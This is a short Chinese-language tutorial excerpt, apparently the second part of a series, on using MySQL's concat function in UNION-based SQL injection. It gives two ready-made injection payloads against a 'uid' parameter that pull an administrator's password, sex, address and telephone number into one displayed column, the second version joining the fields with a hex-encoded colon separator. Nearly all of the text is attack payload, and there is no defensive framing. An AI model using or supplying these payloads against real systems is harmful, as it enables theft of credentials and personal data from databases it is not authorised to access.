Mysql数据库使用concat函数执行SQL注入查询(2)

uid=-1 union select username ,concat(password,sex,address,telephone),content from test_talbe where user_id=管理员id;

这个语句实际查询了六个字段，但是显示的时候，把password,sex,address,telephone等字段合在一起，显示在原本应该显示email的地方。

更好的方法：中间用分隔符分开：

复制代码 代码如下:

uid=-1 union select username ,concat(password,0×3a,sex,0×3a,address,0×3a,telephone) ,content from test_talbe where user_id=管理员id;

其中0×3a是“:”的十六进 制形式。